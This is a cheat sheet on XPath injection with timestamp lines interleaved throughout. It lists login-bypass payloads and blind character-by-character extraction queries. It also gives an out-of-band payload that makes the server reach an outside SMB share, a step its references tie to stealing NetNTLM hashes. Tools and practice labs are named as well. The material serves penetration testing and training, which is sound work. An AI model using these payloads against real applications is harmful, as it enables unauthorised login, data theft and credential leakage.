2022-10-12 10:13:55 +00:00
# XPATH Injection
2018-08-12 21:30:22 +00:00
2019-10-22 21:06:35 +00:00
> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
2024-11-10 20:15:44 +00:00
2019-10-22 21:06:35 +00:00
## Summary
2024-11-07 22:50:30 +00:00
* [Tools ](#tools )
2024-11-10 20:15:44 +00:00
* [Methodology ](#methodology )
2024-11-30 20:14:51 +00:00
* [Blind Exploitation ](#blind-exploitation )
2024-11-10 20:15:44 +00:00
* [Out Of Band Exploitation ](#out-of-band-exploitation )
* [Labs ](#labs )
2019-10-22 21:06:35 +00:00
* [References ](#references )
2017-07-14 21:40:31 +00:00
2024-11-07 22:50:30 +00:00
## Tools
- [orf/xcat ](https://github.com/orf/xcat ) - Automate XPath injection attacks to retrieve documents
- [feakk/xxxpwn ](https://github.com/feakk/xxxpwn ) - Advanced XPath Injection Tool
- [aayla-secura/xxxpwn_smart ](https://github.com/aayla-secura/xxxpwn_smart ) - A fork of xxxpwn using predictive text
- [micsoftvn/xpath-blind-explorer ](https://github.com/micsoftvn/xpath-blind-explorer )
- [Harshal35/XmlChor ](https://github.com/Harshal35/XMLCHOR ) - Xpath injection exploitation tool
2024-11-10 20:15:44 +00:00
## Methodology
2018-08-12 21:30:22 +00:00
2024-11-30 20:14:51 +00:00
Similar to SQL injection, you want to terminate the query properly:
```ps1
string(//user[name/text()='" +vuln_var1+ "' and password/text()='" +vuln_var1+ "']/account/text())
```
2018-08-12 21:30:22 +00:00
```sql
2017-07-14 21:40:31 +00:00
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
2024-11-30 20:14:51 +00:00
')] | //user/*[contains(*,'
') and contains(../password,'c
') and starts-with(../password,'c
2017-07-14 21:40:31 +00:00
```
2024-11-10 20:15:44 +00:00
### Blind Exploitation
2018-08-12 21:30:22 +00:00
2017-07-14 21:40:31 +00:00
1. Size of a string
2019-10-22 21:06:35 +00:00
```sql
and string-length(account)=SIZE_INT
```
2024-11-30 20:14:51 +00:00
2. Access a character with `substring` , and verify its value the `codepoints-to-string` function
2019-10-22 21:06:35 +00:00
```sql
substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
```
2024-11-10 20:15:44 +00:00
### Out Of Band Exploitation
2019-10-22 21:06:35 +00:00
```powershell
http://example.com/?title=Foundation& type=*& rent_days=* and doc('//10.10.10.10/SHARE')
2017-07-14 21:40:31 +00:00
```
2024-11-10 20:15:44 +00:00
## Labs
* [Root Me - XPath injection - Authentication ](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Authentication )
* [Root Me - XPath injection - String ](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-String )
* [Root Me - XPath injection - Blind ](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Blind )
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2024-11-07 22:50:30 +00:00
- [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017 ](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ )
- [XPATH Injection - OWASP - January 21, 2015 ](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010 ))